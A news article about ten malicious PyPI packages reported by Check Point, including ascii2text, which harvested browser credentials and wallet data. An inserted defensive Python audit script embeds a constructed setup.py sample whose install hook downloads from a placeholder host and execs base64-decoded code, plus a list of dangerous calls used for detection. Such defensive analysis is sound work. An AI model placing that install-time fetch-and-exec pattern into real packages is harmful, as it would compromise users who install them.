10 malicious Python packages exposed in latest repository attack


Supply chain attacks, like the latest PyPI discovery, insert malicious code into seemingly functional software packages used by developers. They are becoming more and more common.


Researchers have discovered a set of malicious packages in PyPI, the official and most popular repository for Python programs and code libraries. Those fooled by the seemingly familiar packages can be tricked into downloading malware or having their logins and passwords stolen.

Check Point Research, which reported its findings on Monday, writes that it is unknown how many people downloaded the 10 packages, but notes that PyPI has 613,000 active users and its code is used in more than 390,000 projects. Installing from PyPI via the pip command is a basic step in starting or setting up many Python projects. PePy, a website that estimates Python project downloads, shows that most of the malicious packages had hundreds of downloads.

Supply chain attacks are becoming more and more common, especially against the open source software repositories that underpin much of the world's software. Python's repository is a frequent target, with researchers finding malicious packages in September 2017; June, July and November of 2021; and June of this year. But trick packages have also been found in RubyGems in 2020, NPM in December 2021, and many other open source repositories.

Most notably, a closed-source supply chain attack by Russian hackers via SolarWinds enterprise software wreaked remarkable devastation, leading to the infection of more than 100 companies and at least nine US federal agencies, including the National Nuclear Security Administration, the Internal Revenue Service, the State Department, and the Department of Homeland Security.

The increasingly common discovery of rogue, malicious packages is pushing repositories to take action. Just yesterday, GitHub, the owner of the NPM repository for JavaScript packages, opened a request for comment on providing an opt-in system for package developers to sign and verify their packages. Using Sigstore, a collaboration between open source and industry groups, NPM developers could sign off on packages, signaling that the code within them matches their original repository.

Having a clear indication that the package you're downloading corresponds to the code you need might have helped people avoid the most recently discovered PyPI bad actors, though perhaps not entirely. "Ascii2text" directly copied almost every aspect of the ASCII art library "art", minus the release details. It reached probably close to 1,000 downloads; its descriptive name may suggest a more defined purpose than "art".

Installing ascii2text triggered the download of a malicious script, which then searched the local storage of Opera, Chrome, and other browsers for tokens, passwords, or cookies, along with certain crypto wallet elements, and sent them to a Discord server.
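One pre-install check a practitioner might apply to a package like ascii2text, added here as an illustration and not taken from the article or from Check Point's analysis: parse the package's setup.py, flag the setuptools install hooks and download-and-execute calls of the kind the article describes, and compare the package name against a list of packages you already trust. The setup.py text in the block is constructed for the example (the URL is a placeholder and it is not the real ascii2text code). The name check also shows the caveat from the paragraph above: "ascii2text" is nothing like "art" by string similarity, so a lookalike-name check alone would not have caught it, while the install-hook audit does.

```python
# Added example: audit a package's setup.py for install-time code execution and
# check its name for lookalikes. Not code from the article or from Check Point.
import ast
import difflib

# Calls that have no business running at `pip install` time in a typical package.
DANGEROUS_CALLS = {
    "exec", "eval", "compile", "__import__",
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen", "subprocess.call",
    "base64.b64decode", "urllib.request.urlopen", "requests.get", "requests.post",
}
# setuptools command classes whose subclasses run during installation.
INSTALL_COMMANDS = {"install", "develop", "egg_info", "build_py"}

# Constructed sample in the style the article describes: an install hook that
# fetches and runs a remote script. NOT the real ascii2text code; the URL is a
# placeholder.
SUSPICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import base64, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        code = urllib.request.urlopen("http://example.invalid/payload").read()
        exec(base64.b64decode(code))

setup(name="ascii2txt", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign sample for comparison.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="art", version="5.7", packages=["art"])
'''


def _callee_name(node):
    """Dotted name of a call target, e.g. 'urllib.request.urlopen'; '' if dynamic."""
    parts = []
    func = node.func
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""


def audit_setup_py(source):
    """Return human-readable findings for install-time code execution in a setup.py."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = base.attr if isinstance(base, ast.Attribute) else getattr(base, "id", "")
                if base_name in INSTALL_COMMANDS:
                    findings.append(
                        f"line {node.lineno}: class {node.name} subclasses setuptools "
                        f"'{base_name}' command (runs during pip install)")
        elif isinstance(node, ast.Call):
            name = _callee_name(node)
            if name in DANGEROUS_CALLS:
                findings.append(f"line {node.lineno}: call to {name}")
            elif name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(f"line {node.lineno}: setup() registers a custom cmdclass")
    return findings


def lookalike_names(candidate, known_packages, cutoff=0.75):
    """Known package names the candidate closely resembles (a typosquatting signal).
    Exact matches are not reported, only near misses."""
    name = candidate.lower()
    matches = difflib.get_close_matches(
        name, [k.lower() for k in known_packages], n=5, cutoff=cutoff)
    return [m for m in matches if m != name]


if __name__ == "__main__":
    for finding in audit_setup_py(SUSPICIOUS_SETUP):
        print(finding)
    trusted = ["art", "requests", "urllib3"]
    print("lookalikes for 'requets':", lookalike_names("requets", trusted))
    print("lookalikes for 'ascii2text':", lookalike_names("ascii2text", trusted))
```

Run it against the sdist of a package before installing (`pip download --no-deps --no-binary :all: <name>` fetches the archive without executing setup.py), and treat any finding as a reason to read the hook by hand rather than as proof of malice: plenty of legitimate packages register a cmdclass, but very few fetch and exec remote code at install time.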

Malicious script inside the misleading Python ascii2text package, detected by Check Point Software.

Other packages detected by Check Point targeted AWS and other login credentials and environment variables. Here is the list of PyPI packages reported and since removed:

  • ascii2text
  • pyg-utils
  • pymocks
  • PyProto2
  • test-async
  • free-net-vpn
  • free-net-vpn2
  • zlibsrc
  • browserdiv
  • WINRPCexploit
